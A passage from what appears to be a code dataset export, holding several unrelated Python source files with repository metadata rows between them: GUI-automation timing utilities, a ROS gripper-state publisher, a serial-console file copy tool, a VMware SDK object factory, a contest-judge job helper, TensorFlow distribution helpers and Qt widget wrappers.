* after_listboxfocuschange_wait default(0)
* after_editsetedittext_wait default(0)
* after_editselect_wait default(.02)
* drag_n_drop_move_mouse_wait default(.1)
* before_drag_wait default(.2)
* before_drop_wait default(.1)
* after_drag_n_drop_wait default(.1)
* scroll_step_wait default(.1)
"""
import time
import operator
from functools import wraps
#=========================================================================
class TimeConfig(object):
"""Central storage and manipulation of timing values"""
__default_timing = {
'window_find_timeout' : 5.,
'window_find_retry' : .09,
'app_start_timeout' : 10.,
'app_start_retry' : .90,
'cpu_usage_interval' : .5,
'cpu_usage_wait_timeout' : 20.,
'exists_timeout' : .5,
'exists_retry' : .3,
'after_click_wait' : .09,
'after_clickinput_wait' : .09,
'after_menu_wait' : .1,
'after_sendkeys_key_wait' : .01,
'after_button_click_wait' : 0,
'before_closeclick_wait' : .1,
'closeclick_retry' : .05,
'closeclick_dialog_close_wait' : 2.,
'after_closeclick_wait' : .2,
'after_windowclose_timeout': 2,
'after_windowclose_retry': .5,
'after_setfocus_wait': .06,
'setfocus_timeout': 2,
'setfocus_retry': .1,
'after_setcursorpos_wait' : .01,
'sendmessagetimeout_timeout' : .01,
'after_tabselect_wait': .05,
'after_listviewselect_wait': .01,
'after_listviewcheck_wait': .001,
'after_treeviewselect_wait': .1,
'after_toobarpressbutton_wait': .01,
'after_updownchange_wait': .1,
'after_movewindow_wait': 0,
'after_buttoncheck_wait': 0,
'after_comboboxselect_wait': 0.001,
'after_listboxselect_wait': 0,
'after_listboxfocuschange_wait': 0,
'after_editsetedittext_wait': 0,
'after_editselect_wait': 0.02,
'drag_n_drop_move_mouse_wait': 0.1,
'before_drag_wait': 0.2,
'before_drop_wait': 0.1,
'after_drag_n_drop_wait': 0.1,
'scroll_step_wait': 0.1,
}
assert(__default_timing['window_find_timeout'] >=\
__default_timing['window_find_retry'] * 2)
_timings = __default_timing.copy()
_cur_speed = 1
def __getattribute__(self, attr):
"""Get the value for a particular timing"""
if attr in ['__dict__', '__members__', '__methods__', '__class__']:
return object.__getattribute__(self, attr)
if attr in dir(TimeConfig):
return object.__getattribute__(self, attr)
if attr in self.__default_timing:
return self._timings[attr]
else:
raise AttributeError("Unknown timing setting: {0}".format(attr))
def __setattr__(self, attr, value):
"""Set a particular timing"""
if attr == '_timings':
object.__setattr__(self, attr, value)
elif attr in self.__default_timing:
self._timings[attr] = value
else:
raise AttributeError("Unknown timing setting: {0}".format(attr))
def Fast(self):
"""Set fast timing values
Currently this changes the timing in the following ways:
timeouts = 1 second
waits = 0 seconds
retries = .001 seconds (minimum!)
(if existing times are faster then keep existing times)
"""
for setting in self.__default_timing:
# set timeouts to the min of the current speed or 1 second
if "_timeout" in setting:
self._timings[setting] = \
min(1, self._timings[setting])
if "_wait" in setting:
self._timings[setting] = self._timings[setting] / 2
elif setting.endswith("_retry"):
self._timings[setting] = 0.001
#self._timings['app_start_timeout'] = .5
def Slow(self):
"""Set slow timing values
Currently this changes the timing in the following ways:
timeouts = default timeouts * 10
waits = default waits * 3
retries = default retries * 3
(if existing times are slower then keep existing times)
"""
for setting in self.__default_timing:
if "_timeout" in setting:
self._timings[setting] = max(
self.__default_timing[setting] * 10,
self._timings[setting])
if "_wait" in setting:
self._timings[setting] = max(
self.__default_timing[setting] * 3,
self._timings[setting])
elif setting.endswith("_retry"):
self._timings[setting] = max(
self.__default_timing[setting] * 3,
self._timings[setting])
if self._timings[setting] < .2:
                self._timings[setting] = .2
def Defaults(self):
"""Set all timings to the default time"""
self._timings = self.__default_timing.copy()
Timings = TimeConfig()
#=========================================================================
class TimeoutError(RuntimeError):
pass
#=========================================================================
def always_wait_until(
timeout,
retry_interval,
value = True,
op = operator.eq):
"""Decorator to call wait_until(...) every time for a decorated function/method"""
def wait_until_decorator(func):
"""Callable object that must be returned by the @always_wait_until decorator"""
@wraps(func)
def wrapper(*args):
"""pre-callback, target function call and post-callback"""
return wait_until(timeout, retry_interval,
func, value, op, *args)
return wrapper
return wait_until_decorator
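
# Usage sketch for the decorator above (dlg/is_visible are illustrative names):
#
#   @always_wait_until(5, 0.5)          # retry for up to 5s, every 0.5s
#   def dialog_is_visible(dlg):
#       return dlg.is_visible()
#
# Each call to dialog_is_visible(...) now retries until it returns True.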
#=========================================================================
def wait_until(
timeout,
retry_interval,
func,
value = True,
op = operator.eq,
*args):
r"""Wait until ``op(function(*args), value)`` is True or until timeout expires
* **timeout** how long the function will try the function
* **retry_interval** how long to wait between retries
* **func** the function that will be executed
* **value** the value to be compared against (defaults to True)
* **op** the comparison function (defaults to equality)\
* **args** optional arguments to be passed to func when called
Returns the return value of the function
If the operation times out then the return value of the the function
is in the 'function_value' attribute of the raised exception.
e.g. ::
try:
# wait a maximum of 10.5 seconds for the
# the objects item_count() method to return 10
# in increments of .5 of a second
wait_until(10.5, .5, self.item_count, 10)
except TimeoutError as e:
print("timed out")
"""
start = time.time()
func_val = func(*args)
# while the function hasn't returned what we are waiting for
while not op(func_val, value):
# find out how much of the time is left
time_left = timeout - ( time.time() - start)
# if we have to wait some more
if time_left > 0:
# wait either the retry_interval or else the amount of
# time until the timeout expires (whichever is less)
time.sleep(min(retry_interval, time_left))
func_val = func(*args)
else:
err = TimeoutError("timed out")
err.function_value = func_val
raise err
return func_val
# Non PEP-8 alias
WaitUntil = wait_until
#=========================================================================
def always_wait_until_passes(
timeout,
retry_interval,
exceptions = (Exception)):
"""Decorator to call wait_until_passes(...) every time for a decorated function/method"""
def wait_until_passes_decorator(func):
"""Callable object that must be returned by the @always_wait_until_passes decorator"""
@wraps(func)
def wrapper(*args):
"""pre-callback, target function call and post-callback"""
return wait_until_passes(timeout, retry_interval,
func, exceptions, *args)
return wrapper
return wait_until_passes_decorator
#=========================================================================
def wait_until_passes(
timeout,
retry_interval,
func,
exceptions = (Exception),
*args):
"""Wait until ``func(*args)`` does not raise one of the exceptions in exceptions
* **timeout** how long the function will try the function
* **retry_interval** how long to wait between retries
* **func** the function that will be executed
* **exceptions** list of exceptions to test against (default: Exception)
* **args** optional arguments to be passed to func when called
Returns the return value of the function
If the operation times out then the original exception raised is in
the 'original_exception' attribute of the raised exception.
e.g. ::
try:
# wait a maximum of 10.5 seconds for the
# window to be found in increments of .5 of a second.
            # Print a message and re-raise the original exception if never found.
wait_until_passes(10.5, .5, self.Exists, (ElementNotFoundError))
except TimeoutError as e:
print("timed out")
            raise e
"""
start = time.time()
# keep trying until the timeout is passed
while True:
try:
# Call the function with any arguments
func_val = func(*args)
# if no exception is raised then we are finished
break
# An exception was raised - so wait and try again
except exceptions as e:
# find out how much of the time is left
time_left = timeout - ( time.time() - start)
# if we have to wait some more
if time_left > 0:
# wait either the retry_interval or else the amount of
# time until the timeout expires (whichever is less)
time.sleep(min(retry_interval, time_left))
else:
# Raise a TimeoutError - and put the original exception
# inside it
err = TimeoutError()
err.original_exception = e
raise err
# return the function value
return func_val
# Non PEP-8 alias
WaitUntilPasses = wait_until_passes
| bsd-3-clause | -3,935,834,530,646,250,000 | 31.676744 | 94 | 0.585181 | false |
cpaxton/predicator | predicator_robotiq/src/predicator_robotiq/s_model.py | 1 | 5702 | # predicator (c) 2014-2016, Chris Paxton
#
# based on some code taken from Robotiq's s_model_control package:
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Robotiq, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Robotiq, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Copyright (c) 2012, Robotiq, Inc.
# Revision $Id$
import rospy
from robotiq_s_model_control.msg import SModel_robot_input as inputMsg
from predicator_msgs.msg import *
class SModelPredicator:
def __init__(self,publish_predicates=True,start_subscriber=True,gripper_name='s_model'):
self.valid_predicates = ValidPredicates(assignments=[gripper_name],predicates=['gripper_open','gripper_closed','gripper_moving',
'gripper_basic_mode','gripper_pinch_mode','gripper_wide_mode','gripper_scissor_mode','gripper_activated',
'finger_a_contact','finger_b_contact','finger_c_contact','any_finger_contact'])
self.predicate_msg = PredicateList()
self.gripper_name = gripper_name
self.gripper_mode = ''
self.activated = False
self.contact = False
self.closed = False
self.moving = False
if publish_predicates:
# create predicator things
self.pub = rospy.Publisher("predicator/input",PredicateList,queue_size=1000)
self.vpub = rospy.Publisher("predicator/valid_predicates",PredicateList,queue_size=1000)
if start_subscriber:
self.sub = rospy.Subscriber("SModelRobotInput",inputMsg,self.callback)
self.name = rospy.get_name()
def callback(self, msg):
self.handle(msg)
def handle(self,status):
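        # status is an SModel_robot_input message; the g* fields below map to
        # the Robotiq S-Model status registers (gACT activation, gMOD operation
        # mode, gGTO goto bit, gIMC/gSTA init and motion status, gDTA/B/C
        # per-finger object detection, gDTS scissor detection, gPRA position
        # request echo).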
self.predicate_msg = PredicateList()
self.predicate_msg.pheader.source = self.name
if(status.gACT == 0):
# gripper reset
pass
if(status.gACT == 1):
            self.addPredicate('gripper_activated')
            self.activated = True
        else:
            self.activated = False
if(status.gMOD == 0):
self.addPredicate('gripper_basic_mode')
self.gripper_mode = 'basic'
elif(status.gMOD == 1):
self.addPredicate('gripper_pinch_mode')
self.gripper_mode = 'pinch'
elif(status.gMOD == 2):
self.addPredicate('gripper_wide_mode')
self.gripper_mode = 'wide'
elif(status.gMOD == 3):
self.addPredicate('gripper_scissor_mode')
self.gripper_mode = 'scissor'
if ((status.gGTO == 1) # going to position (GOTO command)
or (status.gIMC == 2) # mode change in progress
or (status.gSTA == 0) # in motion towards position
):
self.addPredicate('gripper_moving')
self.moving = True
else:
self.moving = False
contact = False
if (status.gDTA == 1 or status.gDTA == 2):
self.addPredicate('finger_a_contact')
contact = True
if (status.gDTB == 1 or status.gDTB == 2):
self.addPredicate('finger_b_contact')
contact = True
if (status.gDTC == 1 or status.gDTC == 2):
self.addPredicate('finger_c_contact')
contact = True
self.contact = contact
if contact:
self.addPredicate('any_finger_contact')
if ((status.gDTA >= 2 and status.gDTB >= 2 and status.gDTC >= 2 and status.gPRA >= 250) # fingers closed or stopped closing
or (status.gDTS >=2 and status.gPRA >= 250) # scissor closing
):
self.addPredicate('gripper_closed')
self.closed = True
else:
self.closed = False
'''
add a single message
'''
def addPredicate(self,predicate):
p = PredicateStatement(predicate=predicate,params=[self.gripper_name,'',''])
self.predicate_msg.predicates.append(p)
'''
publish current predicate messages
'''
def tick(self):
self.pub.publish(self.predicate_msg)
self.vpub.publish(self.valid_predicates)
'''
update and spin
'''
def spin(self,rate=10):
spin_rate = rospy.Rate(rate)
while not rospy.is_shutdown():
self.tick()
spin_rate.sleep()
| bsd-2-clause | -316,624,933,566,636,700 | 36.025974 | 136 | 0.639951 | false |
wkz/ccp | ccp.py | 1 | 2743 | #!/usr/bin/env python
import argparse
import base64
import re
import sys
import time
import pexpect
class StdioStream(object):
def pull(self):
return sys.stdin.read()
def push(self, data):
return sys.stdout.write(data)
class LocalStream(object):
def __init__(self, spec):
self.spec = spec
def pull(self):
return open(self.spec).read()
def push(self, data):
open(self.spec, "w").write(data)
class ConsoleStream(object):
PROMPT = re.compile(r"^.*[>#$] $", re.MULTILINE)
def __init__(self, cmd, spec):
self.cmd, self.spec = cmd, spec
self.proc = pexpect.spawn(cmd)
self.proc.sendline()
time.sleep(0.5)
self.proc.expect(ConsoleStream.PROMPT)
def _cmd(self, cmd):
self.proc.sendline(cmd)
self.proc.expect(ConsoleStream.PROMPT)
return self.proc.before[len(cmd):]
def _stty_raw(self):
settings = self._cmd("stty -g").strip()
self.stty = settings.splitlines()[0].strip()
self._cmd("stty raw")
return
def _stty_restore(self):
self._cmd("stty " + self.stty)
return
def pull(self):
data = self._cmd("base64 <%s" % self.spec)
return base64.b64decode(data)
def push(self, data):
b64 = base64.b64encode(data)
self._stty_raw()
self.proc.sendline("dd bs=1 count=%d | base64 -d >%s" %
(len(b64), self.spec))
self._cmd(b64)
self._stty_restore()
def stream(spec):
if spec == "-":
return StdioStream()
commfile = spec.split(":")
if len(commfile) == 1:
return LocalStream(commfile[0])
elif len(commfile) == 2:
return ConsoleStream(commfile[0], commfile[1])
return None
def get_opts():
argp = argparse.ArgumentParser(description="""
Console Copy
If COMM is given, it is assumed to be a valid command for interacting
with a remote UNIX like system. If COMM is not given, FILE may be "-";
in which case ccp will use stdio.
Examples:
Transfer a local file to a remote system connected via conserver:
$ ccp /tmp/data 'console -f ser1':/tmp/data
Grep in a remote file:
$ ccp 'screen /dev/ttyS0 115200':/tmp/data - | grep keyword
""", formatter_class=argparse.RawTextHelpFormatter)
argp.add_argument("src",
help="Source to copy from",metavar="[COMM:]FILE")
argp.add_argument("dst",
help="Destination to copy to", metavar="[COMM:]FILE")
opts = argp.parse_args()
return opts
def main():
opts = get_opts()
data = stream(opts.src).pull()
stream(opts.dst).push(data)
sys.exit(0)
if __name__ == '__main__':
main()
| mit | -219,096,259,822,455,140 | 22.646552 | 75 | 0.593146 | false |
xuru/pyvisdk | pyvisdk/do/storage_placement_action.py | 1 | 1308 |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def StoragePlacementAction(vim, *args, **kwargs):
'''Describes a single storage initial placement action for placing a virtual
machine or a set of virtual disks on a datastore.NOTE: This data object type
and all of its methods are experimental and subject to change in future
releases.'''
obj = vim.client.factory.create('ns0:StoragePlacementAction')
# do some validation checking...
if (len(args) + len(kwargs)) < 3:
        raise IndexError('Expected at least 3 arguments got: %d' % (len(args) + len(kwargs)))
required = [ 'destination', 'relocateSpec', 'type' ]
optional = [ 'ioLatencyBefore', 'spaceUtilAfter', 'spaceUtilBefore', 'vm', 'target',
'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
| mit | 3,664,086,994,449,659,000 | 34.378378 | 124 | 0.626911 | false |
sio2project/oioioi | oioioi/evalmgr/utils.py | 1 | 1149 | import logging
import six
from oioioi.base.utils.db import require_transaction
from oioioi.contests.models import Submission
from oioioi.evalmgr.models import QueuedJob
logger = logging.getLogger(__name__)
@require_transaction
def mark_job_state(environ, state, **kwargs):
"""Sets status of given environ in job queue. Additional arguments are
used to update QueuedJob object. Returns True when the status was
set, and the job should be continued, False when it ought to be
ignored.
"""
if 'submission_id' in environ:
submission = Submission.objects.filter(id=environ['submission_id'])
if submission.exists():
kwargs['submission'] = submission.get()
kwargs['state'] = state
qj, created = QueuedJob.objects.get_or_create(
job_id=environ['job_id'], defaults=kwargs
)
if not created:
if qj.state == 'CANCELLED':
qj.delete()
logger.info('Job %s cancelled.', str(environ['job_id']))
return False
else:
for k, v in six.iteritems(kwargs):
setattr(qj, k, v)
qj.save()
return True
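
# Caller sketch, to be run inside a transaction (state names other than
# 'CANCELLED' are illustrative):
#   if not mark_job_state(environ, 'QUEUED'):
#       return  # the job was cancelled while queued; drop it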
| gpl-3.0 | -7,408,691,713,724,728,000 | 30.916667 | 75 | 0.642298 | false |
google-research/google-research | eim/models/base.py | 1 | 9889 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for models."""
from __future__ import absolute_import
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
def _safe_log(x, eps=1e-8):
return tf.log(tf.clip_by_value(x, eps, 1.0))
def get_squash(squash_eps=1e-6):
return tfp.bijectors.Chain([
tfp.bijectors.AffineScalar(scale=256.),
tfp.bijectors.AffineScalar(
shift=-squash_eps / 2., scale=(1. + squash_eps)),
tfp.bijectors.Sigmoid(),
])
class GSTBernoulli(tfd.Bernoulli):
"""Gumbel-softmax Bernoulli distribution."""
def __init__(self,
temperature,
logits=None,
probs=None,
validate_args=False,
allow_nan_stats=True,
name="GSTBernoulli",
dtype=tf.int32):
"""Construct GSTBernoulli distributions.
Args:
temperature: An 0-D `Tensor`, representing the temperature of a set of
GSTBernoulli distributions. The temperature should be positive.
logits: An N-D `Tensor` representing the log-odds of a positive event.
Each entry in the `Tensor` parametrizes an independent GSTBernoulli
distribution where the probability of an event is sigmoid(logits). Only
one of `logits` or `probs` should be passed in.
probs: An N-D `Tensor` representing the probability of a positive event.
Each entry in the `Tensor` parameterizes an independent Bernoulli
distribution. Only one of `logits` or `probs` should be passed in.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or more
of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
      dtype: Type of the Tensors.
Raises:
ValueError: If both `probs` and `logits` are passed, or if neither.
"""
with tf.name_scope(name, values=[logits, probs, temperature]) as name:
self._temperature = tf.convert_to_tensor(
temperature, name="temperature", dtype=dtype)
if validate_args:
with tf.control_dependencies([tf.assert_positive(temperature)]):
self._temperature = tf.identity(self._temperature)
super(GSTBernoulli, self).__init__(
logits=logits,
probs=probs,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
dtype=dtype,
name=name)
@property
def temperature(self):
"""Distribution parameter for the location."""
return self._temperature
def _sample_n(self, n, seed=None):
new_shape = tf.concat([[n], self.batch_shape_tensor()], 0)
u = tf.random_uniform(new_shape, seed=seed, dtype=self.probs.dtype)
logistic = _safe_log(u) - _safe_log(1 - u)
    # cast to the float dtype of probs so the straight-through estimator below
    # (soft + stop_gradient(hard - soft)) is well-typed and differentiable
    hard_sample = tf.cast(tf.greater(self.logits + logistic, 0), self.probs.dtype)
soft_sample = tf.math.sigmoid((self.logits + logistic) / self.temperature)
sample = soft_sample + tf.stop_gradient(hard_sample - soft_sample)
return tf.cast(sample, self.dtype)
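
# Illustrative GSTBernoulli use (shapes and values are made up):
#   dist = GSTBernoulli(temperature=0.5, logits=tf.zeros([8]), dtype=tf.float32)
#   x = dist.sample()  # hard 0/1 values forward, relaxed gradients backward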
def mlp(inputs,
layer_sizes,
hidden_activation=tf.math.tanh,
final_activation=tf.math.log_sigmoid,
name=None):
"""Creates a simple fully connected multi-layer perceptron."""
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
inputs = tf.layers.flatten(inputs)
for i, s in enumerate(layer_sizes[:-1]):
inputs = tf.layers.dense(
inputs,
units=s,
activation=hidden_activation,
kernel_initializer=tf.initializers.glorot_uniform,
name="layer_%d" % (i + 1))
output = tf.layers.dense(
inputs,
units=layer_sizes[-1],
activation=final_activation,
kernel_initializer=tf.initializers.glorot_uniform,
name="layer_%d" % len(layer_sizes))
return output
def conditional_normal(inputs,
data_dim,
hidden_sizes,
hidden_activation=tf.math.tanh,
scale_min=1e-5,
truncate=False,
bias_init=None,
scale_init=1.,
nn_scale=True,
name=None):
"""Create a conditional Normal distribution."""
flat_data_dim = np.prod(data_dim)
if nn_scale:
raw_params = mlp(
inputs,
hidden_sizes + [2 * flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name)
loc, raw_scale = tf.split(raw_params, 2, axis=-1)
else:
loc = mlp(
inputs,
hidden_sizes + [flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name + "_loc")
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
raw_scale_init = np.log(np.exp(scale_init) - 1 + scale_min)
raw_scale = tf.get_variable(
name="raw_sigma",
shape=[flat_data_dim],
dtype=tf.float32,
initializer=tf.constant_initializer(raw_scale_init),
trainable=True)
scale = tf.math.maximum(scale_min, tf.math.softplus(raw_scale))
# Reshape back to the proper data_dim
loc = tf.reshape(loc, [-1] + data_dim)
scale = tf.reshape(scale, [-1] + data_dim)
# with tf.name_scope(name):
# tf.summary.histogram("scale", scale, family="scales")
# tf.summary.scalar("min_scale", tf.reduce_min(scale), family="scales")
if truncate:
if bias_init is not None:
loc = loc + bias_init
loc = tf.math.sigmoid(loc)
return tfd.Independent(
tfd.TruncatedNormal(loc=loc, scale=scale, low=0., high=1.),
reinterpreted_batch_ndims=len(data_dim))
else:
return tfd.Independent(tfd.Normal(loc=loc, scale=scale),
reinterpreted_batch_ndims=len(data_dim))
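
# Sketch of conditional_normal with hypothetical shapes: given inputs z,
#   dist = conditional_normal(z, data_dim=[28, 28], hidden_sizes=[256],
#                             name="decoder")
# yields a distribution whose log_prob/sample act on [batch, 28, 28] tensors.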
def conditional_bernoulli(inputs,
data_dim,
hidden_sizes,
hidden_activation=tf.math.tanh,
bias_init=None,
dtype=tf.int32,
use_gst=False,
temperature=None,
name=None):
"""Create a conditional Bernoulli distribution."""
flat_data_dim = np.prod(data_dim)
bern_logits = mlp(
inputs,
hidden_sizes + [flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name)
bern_logits = tf.reshape(bern_logits, [-1] + data_dim)
if bias_init is not None:
bern_logits = bern_logits - tf.log(
1. / tf.clip_by_value(bias_init, 0.0001, 0.9999) - 1)
if use_gst:
assert temperature is not None
base_dist = GSTBernoulli(temperature, logits=bern_logits, dtype=dtype)
else:
base_dist = tfd.Bernoulli(logits=bern_logits, dtype=dtype)
return tfd.Independent(base_dist)
class SquashedDistribution(object):
"""Apply a squashing bijector to a distribution."""
def __init__(self, distribution, data_mean, squash_eps=1e-6):
self.distribution = distribution
self.data_mean = data_mean
self.squash = get_squash(squash_eps)
self.unsquashed_data_mean = self.squash.inverse(self.data_mean)
def log_prob(self, data, num_samples=1):
unsquashed_data = (self.squash.inverse(data) - self.unsquashed_data_mean)
log_prob = self.distribution.log_prob(unsquashed_data,
num_samples=num_samples)
log_prob = (log_prob + self.squash.inverse_log_det_jacobian(
data, event_ndims=tf.rank(data) - 1))
return log_prob
def sample(self, num_samples=1):
samples = self.distribution.sample(num_samples)
samples += self.unsquashed_data_mean
samples = self.squash.forward(samples)
return samples
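
# Usage sketch: wrapping a latent-variable model so its samples live in pixel
# space (the wrapped `model` is assumed to expose log_prob/sample as below):
#   squashed = SquashedDistribution(model, data_mean=tf.zeros(data_dim))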
class ProbabilisticModel(object):
"""Abstract class for probablistic models to inherit."""
def log_prob(self, data, num_samples=1):
"""Reshape data so that it is [batch_size] + data_dim."""
batch_shape = tf.shape(data)[:-len(self.data_dim)]
reshaped_data = tf.reshape(data, [tf.math.reduce_prod(batch_shape)] +
self.data_dim)
log_prob = self._log_prob(reshaped_data, num_samples=num_samples)
log_prob = tf.reshape(log_prob, batch_shape)
return log_prob
def _log_prob(self, data, num_samples=1):
pass
def get_independent_normal(data_dim, variance=1.0):
"""Returns an independent normal with event size the size of data_dim.
Args:
data_dim: List of data dimensions.
variance: A scalar that is used as the diagonal entries of the covariance
matrix.
Returns:
Independent normal distribution.
"""
return tfd.Independent(
tfd.Normal(
loc=tf.zeros(data_dim, dtype=tf.float32),
scale=tf.ones(data_dim, dtype=tf.float32)*tf.math.sqrt(variance)),
reinterpreted_batch_ndims=len(data_dim))
| apache-2.0 | -6,552,935,640,835,127,000 | 35.899254 | 80 | 0.631914 | false |
stscieisenhamer/ginga | ginga/qtw/QtHelp.py | 1 | 9071 | #
# QtHelp.py -- customized Qt widgets and convenience functions
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import glob
import os
import math
import ginga.toolkit
from ginga.util import iohelper
configured = False
toolkit = ginga.toolkit.toolkit
# if user wants to force a toolkit
if toolkit == 'qt5':
os.environ['QT_API'] = 'pyqt5'
elif toolkit == 'qt4':
os.environ['QT_API'] = 'pyqt'
elif toolkit == 'pyside':
os.environ['QT_API'] = 'pyside'
have_pyqt4 = False
have_pyqt5 = False
have_pyside = False
try:
from qtpy import QtCore
from qtpy import QtWidgets as QtGui
from qtpy.QtGui import QImage, QColor, QFont, QPixmap, QIcon, \
QCursor, QPainter, QPen, QPolygonF, QPolygon, QTextCursor, \
QDrag, QPainterPath, QBrush
from qtpy.QtCore import QItemSelectionModel
from qtpy.QtWidgets import QApplication
try:
from qtpy.QtWebEngineWidgets import QWebEngineView as QWebView
except ImportError as e:
pass
# Let's see what qtpy configured for us...
from qtpy import PYQT4, PYQT5, PYSIDE
have_pyqt4 = PYQT4
have_pyqt5 = PYQT5
have_pyside = PYSIDE
configured = True
except ImportError as e:
pass
if have_pyqt5:
ginga.toolkit.use('qt5')
os.environ['QT_API'] = 'pyqt5'
elif have_pyqt4:
ginga.toolkit.use('qt4')
os.environ['QT_API'] = 'pyqt'
elif have_pyside:
ginga.toolkit.use('pyside')
os.environ['QT_API'] = 'pyside'
else:
raise ImportError("Failed to configure qt4, qt5 or pyside. Is the 'qtpy' package installed?")
tabwidget_style = """
QTabWidget::pane { margin: 0px,0px,0px,0px; padding: 0px; }
QMdiSubWindow { margin: 0px; padding: 2px; }
"""
class TopLevel(QtGui.QWidget):
app = None
## def __init__(self, *args, **kwdargs):
## return super(TopLevel, self).__init__(self, *args, **kwdargs)
def closeEvent(self, event):
if not (self.app is None):
self.app.quit()
def setApp(self, app):
self.app = app
class ComboBox(QtGui.QComboBox):
def insert_alpha(self, text):
index = 0
while True:
itemText = self.itemText(index)
if len(itemText) == 0:
break
if itemText > text:
self.insertItem(index, text)
return
index += 1
self.addItem(text)
def delete_alpha(self, text):
index = self.findText(text)
self.removeItem(index)
def show_text(self, text):
index = self.findText(text)
self.setCurrentIndex(index)
def append_text(self, text):
self.addItem(text)
class VBox(QtGui.QWidget):
def __init__(self, *args, **kwdargs):
super(VBox, self).__init__(*args, **kwdargs)
layout = QtGui.QVBoxLayout()
# because of ridiculous defaults
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def addWidget(self, w, **kwdargs):
self.layout().addWidget(w, **kwdargs)
def setSpacing(self, val):
self.layout().setSpacing(val)
class HBox(QtGui.QWidget):
def __init__(self, *args, **kwdargs):
super(HBox, self).__init__(*args, **kwdargs)
layout = QtGui.QHBoxLayout()
# because of ridiculous defaults
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def addWidget(self, w, **kwdargs):
self.layout().addWidget(w, **kwdargs)
def setSpacing(self, val):
self.layout().setSpacing(val)
class FileSelection(object):
"""Handle Load Image file dialog from File menu."""
def __init__(self, parent_w):
self.parent = parent_w
self.cb = None
def popup(self, title, callfn, initialdir=None, filename=None):
"""Let user select and load file(s). This allows wildcards and
extensions, like in FBrowser.
Parameters
----------
title : str
Title for the file dialog.
callfn : func
Function used to open the file(s).
initialdir : str or `None`
Directory for file dialog.
filename : str
Filter for file dialog.
"""
self.cb = callfn
filenames = QtGui.QFileDialog.getOpenFileNames(
self.parent, title, initialdir, filename)
# Special handling for PyQt5, see
# https://www.reddit.com/r/learnpython/comments/2xhagb/pyqt5_trouble_with_openinggetting_the_name_of_the/
if ginga.toolkit.get_toolkit() == 'qt5':
filenames = filenames[0]
for filename in filenames:
# Special handling for wildcard or extension.
# This is similar to open_files() in FBrowser plugin.
if '*' in filename or '[' in filename:
info = iohelper.get_fileinfo(filename)
ext = iohelper.get_hdu_suffix(info.numhdu)
files = glob.glob(info.filepath) # Expand wildcard
paths = ['{0}{1}'.format(f, ext) for f in files]
# NOTE: Using drag-drop callback here might give QPainter
# warnings.
for path in paths:
self.cb(path)
# Normal load
else:
self.cb(filename)
class DirectorySelection(object):
"""Handle directory selection dialog."""
def __init__(self, parent_w):
self.parent = parent_w
self.cb = None
def popup(self, title, callfn, initialdir=None):
"""Let user select a directory.
Parameters
----------
title : str
Title for the dialog.
callfn : func
Function used to handle selected directory.
initialdir : str or `None`
Directory for dialog.
"""
self.cb = callfn
dirname = QtGui.QFileDialog.getExistingDirectory(
self.parent, title, initialdir)
if dirname:
self.cb(dirname)
class Timer(object):
"""Abstraction of a GUI-toolkit implemented timer."""
def __init__(self, ival_sec, expire_cb, data=None):
"""Create a timer set to expire after `ival_sec` and which will
call the callable `expire_cb` when it expires.
"""
self.ival_sec = ival_sec
self.data = data
self.timer = QtCore.QTimer()
self.timer.setSingleShot(True)
self.timer.timeout.connect(lambda: expire_cb(self))
def start(self, ival_sec=None):
